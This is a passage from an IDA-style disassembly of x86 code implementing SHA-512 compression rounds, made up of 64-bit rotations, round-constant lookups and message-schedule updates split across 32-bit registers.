or edx, ecx
or ebx, ebp
xor edi, edx
xor esi, ebx
mov ecx, eax
mov ebx, [esp+170h+var_120]
xor edx, edx
mov ebp, eax
shld ebp, ebx, 19h
or edx, ebp
mov ebp, [esp+170h+var_154]
shl ebx, 19h
shr ecx, 7
or ecx, ebx
xor esi, edx
mov edx, [esp+170h+var_158]
xor edi, ecx
mov ecx, [esp+170h+var_120]
mov ebx, edx
xor ebx, ecx
and ebx, [esp+170h+var_150]
and edx, ecx
mov ecx, [esp+170h+var_154]
xor ebp, eax
and ebp, [esp+170h+var_14C]
and ecx, eax
xor ebx, edx
xor ebp, ecx
add edi, ebx
adc esi, ebp
add [esp+170h+var_128], edi
adc [esp+170h+var_124], esi
cmp [esp+170h+var_15C], 0
jz loc_41529E
mov eax, [esp+170h+var_B8]
mov ecx, [esp+170h+var_B4]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 8
mov ebp, eax
shrd ebp, ecx, 1
xor esi, esi
or esi, edi
shr ecx, 1
mov edi, eax
mov edx, eax
shr ebx, 8
shl edi, 1Fh
or edi, ecx
mov ecx, [esp+170h+var_B4]
shrd eax, ecx, 7
shl edx, 18h
or edx, ebx
xor ebx, ebx
or ebx, ebp
xor esi, ebx
xor esi, eax
mov eax, [esp+170h+var_100]
xor edx, edi
shr ecx, 7
xor edx, ecx
mov ecx, [esp+170h+var_FC]
mov ebx, eax
mov ebp, ecx
shrd ebx, ebp, 13h
xor edi, edi
or edi, ebx
mov ebx, ecx
mov [esp+170h+var_160], esi
mov esi, eax
shld ecx, eax, 3
add eax, eax
add eax, eax
shl esi, 0Dh
shr ebp, 13h
or esi, ebp
add eax, eax
shr ebx, 1Dh
or ebx, eax
mov eax, [esp+170h+var_100]
xor ebp, ebp
or ebp, ecx
mov ecx, [esp+170h+var_FC]
shrd eax, ecx, 6
shr ecx, 6
xor esi, ebp
xor edi, ebx
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_F8]
adc edx, [esp+170h+var_F4]
add ecx, [esp+170h+var_108]
adc edx, [esp+170h+var_104]
mov [eax+60h], ecx
mov [eax+64h], edx
mov eax, edx
mov [esp+170h+var_108], ecx
mov [esp+170h+var_104], eax
mov [esp+170h+var_70], ecx
jmp short loc_4152AD
; ---------------------------------------------------------------------------
loc_41529E: ; CODE XREF: sub_414BC0+605j
mov edx, [esp+170h+var_108]
mov eax, [esp+170h+var_104]
mov [esp+170h+var_70], edx
loc_4152AD: ; CODE XREF: sub_414BC0+6DCj
mov ecx, [esp+170h+var_144]
mov ebx, ecx
mov [esp+170h+var_6C], eax
mov eax, [esp+170h+var_148]
mov edx, ecx
xor esi, esi
shr edx, 9
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
or edx, edi
xor ebx, ebx
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_144]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
xor edi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
or edi, ebx
xor edx, edi
shr ebp, 0Eh
mov ecx, eax
shl ecx, 12h
or ecx, ebp
xor esi, ecx
mov ecx, [esp+170h+var_144]
mov ebx, ecx
and ecx, [esp+170h+var_13C]
mov edi, eax
and eax, [esp+170h+var_140]
not ebx
and ebx, [esp+170h+var_134]
not edi
and edi, [esp+170h+var_138]
xor ebx, ecx
mov ecx, [esp+170h+var_12C]
xor edi, eax
mov eax, [esp+170h+var_15C]
add edx, edi
adc esi, ebx
add edx, ds:dword_41FA08[eax*8]
adc esi, ds:dword_41FA0C[eax*8]
add edx, [esp+170h+var_70]
mov eax, [esp+170h+var_130]
adc esi, [esp+170h+var_6C]
add eax, edx
adc ecx, esi
add [esp+170h+var_150], eax
mov [esp+170h+var_12C], ecx
mov [esp+170h+var_130], eax
adc [esp+170h+var_14C], ecx
mov eax, [esp+170h+var_124]
mov ecx, [esp+170h+var_128]
mov edx, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
mov esi, ecx
xor edi, edi
or edi, edx
mov ebp, eax
shld ebp, ecx, 1Eh
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shl ecx, 1Eh
shr edx, 2
xor ebx, ebx
or edx, ecx
or ebx, ebp
xor edi, edx
xor esi, ebx
mov ecx, eax
mov ebx, [esp+170h+var_128]
xor edx, edx
mov ebp, eax
shld ebp, ebx, 19h
or edx, ebp
mov ebp, [esp+170h+var_11C]
shl ebx, 19h
shr ecx, 7
or ecx, ebx
xor esi, edx
mov edx, [esp+170h+var_120]
xor edi, ecx
mov ecx, [esp+170h+var_128]
mov ebx, edx
xor ebx, ecx
and ebx, [esp+170h+var_158]
and edx, ecx
mov ecx, [esp+170h+var_11C]
xor ebp, eax
and ebp, [esp+170h+var_154]
and ecx, eax
xor ebx, edx
xor ebp, ecx
add edi, ebx
adc esi, ebp
add [esp+170h+var_130], edi
adc [esp+170h+var_12C], esi
cmp [esp+170h+var_15C], 0
jz loc_4154DA
mov eax, [esp+170h+var_A8]
mov ecx, [esp+170h+var_A4]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 8
mov ebp, eax
shrd ebp, ecx, 1
xor esi, esi
or esi, edi
shr ecx, 1
mov edi, eax
mov edx, eax
shr ebx, 8
shl edi, 1Fh
or edi, ecx
mov ecx, [esp+170h+var_A4]
shrd eax, ecx, 7
shl edx, 18h
or edx, ebx
xor ebx, ebx
or ebx, ebp
xor esi, ebx
xor esi, eax
mov eax, [esp+170h+var_110]
xor edx, edi
shr ecx, 7
xor edx, ecx
mov ecx, [esp+170h+var_10C]
mov ebx, eax
mov ebp, ecx
shrd ebx, ebp, 13h
xor edi, edi
or edi, ebx
mov ebx, ecx
mov [esp+170h+var_160], esi
mov esi, eax
shld ecx, eax, 3
add eax, eax
add eax, eax
shl esi, 0Dh
shr ebp, 13h
or esi, ebp
add eax, eax
shr ebx, 1Dh
or ebx, eax
mov eax, [esp+170h+var_110]
xor ebp, ebp
or ebp, ecx
mov ecx, [esp+170h+var_10C]
shrd eax, ecx, 6
shr ecx, 6
xor esi, ebp
xor edi, ebx
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_B0]
adc edx, [esp+170h+var_AC]
add ecx, [esp+170h+var_B8]
adc edx, [esp+170h+var_B4]
mov [eax+68h], ecx
mov [eax+6Ch], edx
mov eax, edx
mov [esp+170h+var_B8], ecx
mov [esp+170h+var_B4], eax
mov [esp+170h+var_38], ecx
jmp short loc_4154EF
; ---------------------------------------------------------------------------
loc_4154DA: ; CODE XREF: sub_414BC0+82Fj
mov edx, [esp+170h+var_B8]
mov eax, [esp+170h+var_B4]
mov [esp+170h+var_38], edx
loc_4154EF: ; CODE XREF: sub_414BC0+918j
mov ecx, [esp+170h+var_14C]
mov ebx, ecx
mov [esp+170h+var_34], eax
mov eax, [esp+170h+var_150]
xor esi, esi
mov edx, ecx
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
xor ebx, ebx
shr edx, 9
or edx, edi
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_14C]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
xor edi, edi
or edi, ebx
xor edx, edi
shr ebp, 0Eh
mov ecx, eax
shl ecx, 12h
or ecx, ebp
mov ebp, [esp+170h+var_148]
xor esi, ecx
mov ecx, [esp+170h+var_14C]
and ebp, eax
mov edi, eax
mov eax, [esp+170h+var_144]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_134]
not ebx
and ebx, [esp+170h+var_13C]
not edi
and edi, [esp+170h+var_140]
xor ebx, eax
mov eax, [esp+170h+var_15C]
xor edi, ebp
add edx, edi
adc esi, ebx
add edx, ds:dword_41FA10[eax*8]
adc esi, ds:dword_41FA14[eax*8]
add edx, [esp+170h+var_38]
mov eax, [esp+170h+var_138]
adc esi, [esp+170h+var_34]
add eax, edx
adc ecx, esi
add [esp+170h+var_158], eax
mov [esp+170h+var_134], ecx
mov [esp+170h+var_138], eax
adc [esp+170h+var_154], ecx
mov ecx, [esp+170h+var_130]
mov eax, [esp+170h+var_12C]
mov edx, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
mov esi, ecx
mov ebp, eax
shld ebp, ecx, 1Eh
xor edi, edi
or edi, edx
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shr edx, 2
shl ecx, 1Eh
xor ebx, ebx
or edx, ecx
or ebx, ebp
xor edi, edx
xor esi, ebx
mov ebx, [esp+170h+var_130]
xor edx, edx
mov ebp, eax
shld ebp, ebx, 19h
or edx, ebp
mov ebp, [esp+170h+var_124]
shl ebx, 19h
xor esi, edx
mov edx, [esp+170h+var_128]
mov ecx, eax
shr ecx, 7
or ecx, ebx
xor edi, ecx
mov ecx, [esp+170h+var_130]
mov ebx, edx
xor ebx, ecx
and ebx, [esp+170h+var_120]
and edx, ecx
mov ecx, [esp+170h+var_124]
xor ebp, eax
and ebp, [esp+170h+var_11C]
and ecx, eax
xor ebx, edx
xor ebp, ecx
add edi, ebx
adc esi, ebp
add [esp+170h+var_138], edi
adc [esp+170h+var_134], esi
cmp [esp+170h+var_15C], 0
jz loc_415720
mov eax, [esp+170h+var_D0]
mov ecx, [esp+170h+var_CC]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 8
mov ebp, eax
shrd ebp, ecx, 1
xor esi, esi
or esi, edi
shr ecx, 1
mov edi, eax
mov edx, eax
shr ebx, 8
shl edi, 1Fh
or edi, ecx
mov ecx, [esp+170h+var_CC]
shrd eax, ecx, 7
shl edx, 18h
or edx, ebx
xor ebx, ebx
or ebx, ebp
xor esi, ebx
xor esi, eax
mov eax, [esp+170h+var_108]
xor edx, edi
shr ecx, 7
xor edx, ecx
mov ecx, [esp+170h+var_104]
mov ebx, eax
mov ebp, ecx
shrd ebx, ebp, 13h
xor edi, edi
or edi, ebx
mov ebx, ecx
mov [esp+170h+var_160], esi
mov esi, eax
shld ecx, eax, 3
add eax, eax
add eax, eax
shl esi, 0Dh
shr ebp, 13h
or esi, ebp
add eax, eax
shr ebx, 1Dh
or ebx, eax
mov eax, [esp+170h+var_108]
xor ebp, ebp
or ebp, ecx
mov ecx, [esp+170h+var_104]
shrd eax, ecx, 6
shr ecx, 6
xor esi, ebp
xor edi, ebx
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_C0]
adc edx, [esp+170h+var_BC]
add ecx, [esp+170h+var_A8]
adc edx, [esp+170h+var_A4]
mov [eax+70h], ecx
mov [eax+74h], edx
mov eax, edx
mov [esp+170h+var_A8], ecx
mov [esp+170h+var_A4], eax
mov [esp+170h+var_88], ecx
jmp short loc_415735
; ---------------------------------------------------------------------------
loc_415720: ; CODE XREF: sub_414BC0+A75j
mov edx, [esp+170h+var_A8]
mov eax, [esp+170h+var_A4]
mov [esp+170h+var_88], edx
loc_415735: ; CODE XREF: sub_414BC0+B5Ej
mov ecx, [esp+170h+var_154]
mov [esp+170h+var_84], eax
mov eax, [esp+170h+var_158]
mov ebx, ecx
xor esi, esi
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
mov edx, ecx
shr edx, 9
or edx, edi
mov ebp, eax
shrd ebp, ecx, 12h
xor ebx, ebx
or ebx, ebp
mov ebp, [esp+170h+var_154]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
xor edi, edi
or edi, ebx
xor edx, edi
mov ecx, eax
shl ecx, 12h
shr ebp, 0Eh
or ecx, ebp
mov ebp, [esp+170h+var_150]
xor esi, ecx
mov ecx, [esp+170h+var_154]
and ebp, eax
mov edi, eax
mov eax, [esp+170h+var_14C]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_13C]
not edi
and edi, [esp+170h+var_148]
not ebx
and ebx, [esp+170h+var_144]
xor edi, ebp
xor ebx, eax
mov eax, [esp+170h+var_15C]
add edx, edi
adc esi, ebx
add edx, ds:dword_41FA18[eax*8]
mov edi, [esp+170h+var_12C]
adc esi, ds:dword_41FA1C[eax*8]
add edx, [esp+170h+var_88]
mov eax, [esp+170h+var_140]
adc esi, [esp+170h+var_84]
add eax, edx
adc ecx, esi
add [esp+170h+var_120], eax
mov esi, [esp+170h+var_130]
mov [esp+170h+var_140], eax
adc [esp+170h+var_11C], ecx
mov [esp+170h+var_13C], ecx
mov ecx, [esp+170h+var_138]
mov eax, esi
xor eax, ecx
mov [esp+170h+var_98], eax
mov eax, [esp+170h+var_134]
mov edx, edi
xor edx, eax
mov [esp+170h+var_94], edx
mov edx, esi
and edx, ecx
mov [esp+170h+var_90], edx
mov edx, edi
and edx, eax
mov [esp+170h+var_8C], edx
mov edx, ecx
xor esi, esi
shl edx, 4
mov edi, ecx
mov ebx, eax
shrd edi, ebx, 1Ch
shr ebx, 1Ch
or edx, ebx
or esi, edi
mov ebp, eax
shld ebp, ecx, 1Eh
xor ebx, ebx
shl ecx, 1Eh
or ebx, ebp
mov edi, eax
xor edx, ebx
mov ebx, [esp+170h+var_138]
shr edi, 2
or edi, ecx
mov ecx, eax
shld eax, ebx, 19h
xor esi, edi
shr ecx, 7
xor edi, edi
or edi, eax
mov eax, [esp+170h+var_98]
and eax, [esp+170h+var_128]
shl ebx, 19h
xor eax, [esp+170h+var_90]
or ecx, ebx
xor esi, ecx
mov ecx, [esp+170h+var_94]
and ecx, [esp+170h+var_124]
xor edx, edi
xor ecx, [esp+170h+var_8C]
add esi, eax
adc edx, ecx
add [esp+170h+var_140], esi
adc [esp+170h+var_13C], edx
cmp [esp+170h+var_15C], 0
jz loc_4159A2
mov eax, [esp+170h+var_B8]
mov ecx, [esp+170h+var_B4]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 13h
xor esi, esi
or esi, edi
mov edi, ecx
shr ebx, 13h
mov edx, eax
mov ebp, eax
shld ecx, ebp, 3
shl edx, 0Dh
or edx, ebx
xor ebx, ebx
or ebx, ecx
mov ecx, [esp+170h+var_B4]
shrd eax, ecx, 6
add ebp, ebp
add ebp, ebp
add ebp, ebp
shr edi, 1Dh
or edi, ebp
xor esi, edi
xor esi, eax
mov eax, [esp+170h+var_D8]
xor edx, ebx
shr ecx, 6
xor edx, ecx
mov ecx, [esp+170h+var_D4]
mov ebp, ecx
mov ebx, eax
shrd ebx, ebp, 8
xor edi, edi
or edi, ebx
mov [esp+170h+var_160], esi
mov esi, eax
mov ebx, eax
shrd eax, ecx, 1
shl esi, 18h
shr ebp, 8
or esi, ebp
shr ecx, 1
xor ebp, ebp
or ebp, eax
mov eax, [esp+170h+var_D8]
shl ebx, 1Fh
or ebx, ecx
mov ecx, [esp+170h+var_D4]
shrd eax, ecx, 7
shr ecx, 7
xor esi, ebx
xor edi, ebp
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_D0]
adc edx, [esp+170h+var_CC]
add ecx, [esp+170h+var_A0]
adc edx, [esp+170h+var_9C]
mov [eax+78h], ecx
mov [eax+7Ch], edx
mov eax, edx
mov [esp+170h+var_D0], ecx
mov [esp+170h+var_CC], eax
mov [esp+170h+var_60], ecx
jmp short loc_4159B7
; ---------------------------------------------------------------------------
loc_4159A2: ; CODE XREF: sub_414BC0+CEBj
mov edx, [esp+170h+var_D0]
mov eax, [esp+170h+var_CC]
mov [esp+170h+var_60], edx
loc_4159B7: ; CODE XREF: sub_414BC0+DE0j
mov ecx, [esp+170h+var_11C]
mov ebx, ecx
mov [esp+170h+var_5C], eax
mov eax, [esp+170h+var_120]
xor esi, esi
mov edx, ecx
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
xor ebx, ebx
shr edx, 9
or edx, edi
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_11C]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
shr ebp, 0Eh
xor edi, edi
or edi, ebx
xor edx, edi
mov ecx, eax
shl ecx, 12h
or ecx, ebp
mov ebp, [esp+170h+var_158]
xor esi, ecx
mov ecx, [esp+170h+var_11C]
and ebp, eax
mov edi, eax
mov eax, [esp+170h+var_154]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_148]
not ebx
and ebx, [esp+170h+var_14C]
not edi
and edi, [esp+170h+var_150]
xor ebx, eax
mov eax, [esp+170h+var_15C]
xor edi, ebp
add edx, edi
adc esi, ebx
add edx, ds:dword_41FA20[eax*8]
adc esi, ds:dword_41FA24[eax*8]
add edx, [esp+170h+var_60]
mov eax, [esp+170h+var_128]
adc esi, [esp+170h+var_5C]
add ecx, edx
mov edx, [esp+170h+var_144]
adc edx, esi
add eax, ecx
adc [esp+170h+var_124], edx
mov [esp+170h+var_148], ecx
mov ecx, [esp+170h+var_140]
mov [esp+170h+var_144], edx
mov edx, [esp+170h+var_13C]
mov ebx, ecx
mov ebp, edx
shrd ebx, ebp, 1Ch
xor edi, edi
or edi, ebx
mov esi, ecx
mov ebx, edx
shld edx, ecx, 1Eh
shr ebp, 1Ch
shl esi, 4
or esi, ebp
shr ebx, 2
shl ecx, 1Eh
xor ebp, ebp
or ebx, ecx
mov [esp+170h+var_128], eax
or ebp, edx
mov ecx, [esp+170h+var_13C]
xor esi, ebp
mov ebp, [esp+170h+var_140]
mov edx, ecx
shld ecx, ebp, 19h
xor edi, ebx
shr edx, 7
xor ebx, ebx
or ebx, ecx
mov ecx, [esp+170h+var_98]
and ecx, [esp+170h+var_140]
shl ebp, 19h
xor ecx, [esp+170h+var_90]
or edx, ebp
xor edi, edx
mov edx, [esp+170h+var_94]
and edx, [esp+170h+var_13C]
xor esi, ebx
xor edx, [esp+170h+var_8C]
add edi, ecx
adc esi, edx
add [esp+170h+var_148], edi
adc [esp+170h+var_144], esi
cmp [esp+170h+var_15C], 0
jz loc_415BFD
mov eax, [esp+170h+var_A8]
mov ecx, [esp+170h+var_A4]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 13h
xor esi, esi
or esi, edi
mov edi, ecx
shr ebx, 13h
mov edx, eax
mov ebp, eax
shld ecx, ebp, 3
shl edx, 0Dh
or edx, ebx
xor ebx, ebx
or ebx, ecx
mov ecx, [esp+170h+var_A4]
shrd eax, ecx, 6
add ebp, ebp
add ebp, ebp
add ebp, ebp
shr edi, 1Dh
or edi, ebp
xor esi, edi
xor esi, eax
mov eax, [esp+170h+var_118]
xor edx, ebx
shr ecx, 6
xor edx, ecx
mov ecx, [esp+170h+var_114]
mov ebp, ecx
mov ebx, eax
shrd ebx, ebp, 8
xor edi, edi
or edi, ebx
mov [esp+170h+var_160], esi
mov esi, eax
mov ebx, eax
shrd eax, ecx, 1
shl esi, 18h
shr ebp, 8
or esi, ebp
shr ecx, 1
xor ebp, ebp
or ebp, eax
mov eax, [esp+170h+var_118]
shl ebx, 1Fh
or ebx, ecx
mov ecx, [esp+170h+var_114]
shrd eax, ecx, 7
shr ecx, 7
xor esi, ebx
xor edi, ebp
xor edi, eax
mov eax, [esp+170h+arg_0]
xor esi, ecx
mov ecx, [esp+170h+var_160]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_D8]
adc edx, [esp+170h+var_D4]
add ecx, [esp+170h+var_E0]
adc edx, [esp+170h+var_DC]
mov [eax+80h], ecx
mov [eax+84h], edx
mov eax, edx
mov [esp+170h+var_D4], eax
mov [esp+170h+var_14], eax
mov eax, [esp+170h+var_128]
mov [esp+170h+var_D8], ecx
mov [esp+170h+var_18], ecx
jmp short loc_415C19
; ---------------------------------------------------------------------------
loc_415BFD: ; CODE XREF: sub_414BC0+F41j
mov edx, [esp+170h+var_D8]
mov ecx, [esp+170h+var_D4]
mov [esp+170h+var_18], edx
mov [esp+170h+var_14], ecx
loc_415C19: ; CODE XREF: sub_414BC0+103Bj
mov ecx, [esp+170h+var_124]
mov ebx, ecx
xor esi, esi
mov edx, ecx
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
xor ebx, ebx
shr edx, 9
or edx, edi
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_124]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
xor edi, edi
or edi, ebx
xor edx, edi
shr ebp, 0Eh
mov ecx, eax
shl ecx, 12h
or ecx, ebp
mov ebp, [esp+170h+var_120]
xor esi, ecx
mov ecx, [esp+170h+var_124]
and ebp, eax
mov edi, eax
mov eax, [esp+170h+var_11C]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_14C]
not ebx
and ebx, [esp+170h+var_154]
not edi
and edi, [esp+170h+var_158]
xor ebx, eax
mov eax, [esp+170h+var_15C]
xor edi, ebp
add edx, edi
adc esi, ebx
add edx, ds:dword_41FA28[eax*8]
adc esi, ds:dword_41FA2C[eax*8]
add edx, [esp+170h+var_18]
mov eax, [esp+170h+var_150]
adc esi, [esp+170h+var_14]
add eax, edx
adc ecx, esi
add [esp+170h+var_130], eax
mov [esp+170h+var_14C], ecx
mov [esp+170h+var_150], eax
adc [esp+170h+var_12C], ecx
mov eax, [esp+170h+var_144]
mov ecx, [esp+170h+var_148]
mov edx, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
mov esi, ecx
xor edi, edi
or edi, edx
mov ebp, eax
shld ebp, ecx, 1Eh
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shl ecx, 1Eh
shr edx, 2
xor ebx, ebx
or edx, ecx
or ebx, ebp
xor edi, edx
xor esi, ebx
mov ecx, eax
mov ebx, [esp+170h+var_148]
mov ebp, eax
shld ebp, ebx, 19h
xor edx, edx
or edx, ebp
mov ebp, [esp+170h+var_13C]
xor ebp, [esp+170h+var_134]
shl ebx, 19h
shr ecx, 7
or ecx, ebx
xor esi, edx
mov edx, [esp+170h+var_140]
xor edi, ecx
mov ecx, [esp+170h+var_138]
and ebp, eax
mov eax, [esp+170h+var_13C]
and eax, [esp+170h+var_134]
mov ebx, edx
xor ebx, ecx
and ebx, [esp+170h+var_148]
and edx, ecx
xor ebx, edx
xor ebp, eax
add edi, ebx
adc esi, ebp
add [esp+170h+var_150], edi
adc [esp+170h+var_14C], esi
cmp [esp+170h+var_15C], 0
jz loc_415E41
mov eax, [esp+170h+var_C8]
mov ecx, [esp+170h+var_C4]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 8
mov ebp, eax
shrd ebp, ecx, 1
xor esi, esi
or esi, edi
shr ecx, 1
mov edi, eax
mov edx, eax
shr ebx, 8
shl edi, 1Fh
or edi, ecx
mov ecx, [esp+170h+var_C4]
shrd eax, ecx, 7
shl edx, 18h
or edx, ebx
xor ebx, ebx
or ebx, ebp
xor esi, ebx
xor esi, eax
mov eax, [esp+170h+var_D0]
xor edx, edi
shr ecx, 7
xor edx, ecx
mov ecx, [esp+170h+var_CC]
mov ebx, eax
mov ebp, ecx
shrd ebx, ebp, 13h
xor edi, edi
or edi, ebx
mov ebx, ecx
mov [esp+170h+var_160], esi
mov esi, eax
shld ecx, eax, 3
add eax, eax
add eax, eax
shl esi, 0Dh
shr ebp, 13h
or esi, ebp
add eax, eax
shr ebx, 1Dh
or ebx, eax
mov eax, [esp+170h+var_D0]
xor ebp, ebp
or ebp, ecx
mov ecx, [esp+170h+var_CC]
shrd eax, ecx, 6
shr ecx, 6
xor esi, ebp
xor edi, ebx
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_118]
adc edx, [esp+170h+var_114]
add ecx, [esp+170h+var_100]
adc edx, [esp+170h+var_FC]
mov [eax+88h], ecx
mov [eax+8Ch], edx
mov eax, edx
mov [esp+170h+var_118], ecx
mov [esp+170h+var_114], eax
mov [esp+170h+var_48], ecx
jmp short loc_415E50
; ---------------------------------------------------------------------------
loc_415E41: ; CODE XREF: sub_414BC0+1196j
mov edx, [esp+170h+var_118]
mov eax, [esp+170h+var_114]
mov [esp+170h+var_48], edx
loc_415E50: ; CODE XREF: sub_414BC0+127Fj
mov ecx, [esp+170h+var_12C]
mov ebx, ecx
mov [esp+170h+var_44], eax
mov eax, [esp+170h+var_130]
xor esi, esi
mov edx, ecx
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
xor ebx, ebx
shr edx, 9
or edx, edi
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_12C]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
xor edi, edi
or edi, ebx
xor edx, edi
shr ebp, 0Eh
mov ecx, eax
shl ecx, 12h
or ecx, ebp
mov ebp, [esp+170h+var_128]
xor esi, ecx
mov ecx, [esp+170h+var_12C]
and ebp, eax
mov edi, eax
mov eax, [esp+170h+var_124]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_154]
not ebx
and ebx, [esp+170h+var_11C]
not edi
and edi, [esp+170h+var_120]
xor ebx, eax
mov eax, [esp+170h+var_15C]
xor edi, ebp
add edx, edi
adc esi, ebx
add edx, ds:dword_41FA30[eax*8]
adc esi, ds:dword_41FA34[eax*8]
add edx, [esp+170h+var_48]
mov eax, [esp+170h+var_158]
adc esi, [esp+170h+var_44]
add eax, edx
adc ecx, esi
add [esp+170h+var_138], eax
mov [esp+170h+var_154], ecx
mov [esp+170h+var_158], eax
adc [esp+170h+var_134], ecx
mov ecx, [esp+170h+var_150]
mov eax, [esp+170h+var_14C]
mov edx, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
mov esi, ecx
mov ebp, eax
shld ebp, ecx, 1Eh
xor edi, edi
or edi, edx
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shr edx, 2
shl ecx, 1Eh
xor ebx, ebx
or edx, ecx
or ebx, ebp
xor edi, edx
xor esi, ebx
mov ebx, [esp+170h+var_150]
mov ebp, eax
shld ebp, ebx, 19h
shl ebx, 19h
mov ecx, eax
shr ecx, 7
or ecx, ebx
xor edx, edx
or edx, ebp
xor edi, ecx
mov ecx, [esp+170h+var_150]
xor esi, edx
mov edx, [esp+170h+var_140]
mov ebx, ecx
xor ebx, edx
and ebx, [esp+170h+var_148]
mov ebp, eax
xor ebp, [esp+170h+var_13C]
and eax, [esp+170h+var_13C]
and ebp, [esp+170h+var_144]
and ecx, edx
xor ebx, ecx
xor ebp, eax
add edi, ebx
adc esi, ebp
add [esp+170h+var_158], edi
adc [esp+170h+var_154], esi
cmp [esp+170h+var_15C], 0
jz loc_41608B
mov eax, [esp+170h+var_D8]
mov ecx, [esp+170h+var_D4]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 13h
xor esi, esi
or esi, edi
mov edi, ecx
shr ebx, 13h
mov edx, eax
mov ebp, eax
shld ecx, ebp, 3
shl edx, 0Dh
or edx, ebx
xor ebx, ebx
or ebx, ecx
mov ecx, [esp+170h+var_D4]
shrd eax, ecx, 6
add ebp, ebp
add ebp, ebp
add ebp, ebp
shr edi, 1Dh
or edi, ebp
xor esi, edi
xor esi, eax
mov eax, [esp+170h+var_F0]
xor edx, ebx
shr ecx, 6
xor edx, ecx
mov ecx, [esp+170h+var_EC]
mov ebp, ecx
mov ebx, eax
shrd ebx, ebp, 8
xor edi, edi
or edi, ebx
mov [esp+170h+var_160], esi
mov esi, eax
mov ebx, eax
shrd eax, ecx, 1
shl esi, 18h
shr ebp, 8
or esi, ebp
shr ecx, 1
xor ebp, ebp
or ebp, eax
mov eax, [esp+170h+var_F0]
shl ebx, 1Fh
or ebx, ecx
mov ecx, [esp+170h+var_EC]
shrd eax, ecx, 7
shr ecx, 7
xor esi, ebx
xor edi, ebp
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_C8]
adc edx, [esp+170h+var_C4]
add ecx, [esp+170h+var_110]
adc edx, [esp+170h+var_10C]
mov [eax+90h], ecx
mov [eax+94h], edx
mov eax, edx
mov [esp+170h+var_C8], ecx
mov [esp+170h+var_C4], eax
mov [esp+170h+var_80], ecx
jmp short loc_4160A0
; ---------------------------------------------------------------------------
loc_41608B: ; CODE XREF: sub_414BC0+13D4j
mov edx, [esp+170h+var_C8]
mov eax, [esp+170h+var_C4]
mov [esp+170h+var_80], edx
loc_4160A0: ; CODE XREF: sub_414BC0+14C9j
mov ecx, [esp+170h+var_134]
mov ebx, ecx
mov [esp+170h+var_7C], eax
mov eax, [esp+170h+var_138]
xor esi, esi
mov edx, ecx
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
xor ebx, ebx
shr edx, 9
or edx, edi
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_134]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
